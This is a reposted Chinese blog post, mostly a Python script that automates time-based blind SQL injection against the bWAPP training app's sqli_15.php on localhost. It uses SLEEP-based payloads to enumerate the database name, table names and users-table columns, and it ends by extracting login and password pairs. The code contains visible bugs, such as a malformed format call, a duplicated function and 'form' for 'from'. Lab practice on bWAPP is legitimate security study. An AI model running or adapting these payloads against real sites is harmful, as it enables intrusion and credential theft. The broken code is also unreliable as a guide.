标签:count get url script ---- start sql time table
import requests
import time
import yaml
HEADER={
"cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# 读取test.yaml文件
with open(config_path, "r") as file:
data = yaml.load(file.read())
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)
def get_database_name_length(a,b)->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
if a[-1]!="?":
a=a+"?"
for i in range(1,100):
url=a+b.format(i)
start_time = time.time()
print(url)
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库长度
def get_database_name()->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库名称
def get_database_table(count):
#mmp=get_database_name()
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
print("盲注数据库名长度为{}".chr(m))
break
print("打印数据库名称"+x)
#获得数据库此库下面表数量
def get_table_count()->int:
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
count =i
print("打印当前数据库下面表数量{}"+str(count))
break
return count
#获得每个数据库表名的长度
def get_table_counts(counts)->int:
for i in range(counts + 1):
for m in range(1,100):
url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
" and sleep(2) -- &action=search".format(i,m)
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
print("打印当前表名长度{}".format(m))
get_database_tabless(i, m)
break
return m
#获得所有数据库的表名
def get_database_tabless(index,count):
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr((select table_name from information_schema.tables " \
"where table_schema=database() limit {},1),{},1))={}" \
" and sleep(2) -- &action=search".format(index,i,m)
#上面的意思是select括号里面,获得表的长度(第一个表),substr('str',1,1)然后来判断第一个表的字符是什么
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
break
print("打印数据库名称{}" + x)
x=""
return x
#根据打印结果,想需要users表里面的列总数
def get_table_count()->int:
count=0
#select count(column_name) from information_schema.columns where table_name='users' 统计users表中有多少个字段
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
"AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库中users表列数量为:{}".format(i))
count = i
return count
return count
#获得users表中列名的长度
def get_table_nameNumber(count):
for i in range(count+1):
for j in range(100):
url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
get_column_name_of(i,j)
print("user表,字段长度为{}".format(j))
break
#获取每个字段的名称
def get_column_name_of(index,count):
for i in range(count+1):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
"AND SLEEP(2) -- &action=search".format(index,i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
print(chr(j))
break
#获得所需字段的用户名跟密码
def get_username_password():
values=""
for i in range(100):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
values=values+chr(j)
break
print(values)
values=""
备注:盲注的时候一般使用and
if __name__=='__main__':
#get_table_counts(get_table_count())
#get_database_table(get_database_name())
#get_table_counts(get_table_count())
#get_table_count()
#get_table_count()#打印users表中总列数量
get_username_password()#打印需要的日志
userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入
标签:count,get,url,script,----,start,sql,time,table 来源: https://www.cnblogs.com/wendy-0901/p/16467320.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。